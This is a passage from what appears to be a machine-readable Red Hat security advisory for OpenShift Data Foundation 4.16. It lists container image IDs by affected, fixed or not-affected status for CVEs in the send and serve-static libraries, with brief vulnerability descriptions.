"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], known_not_affected: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", 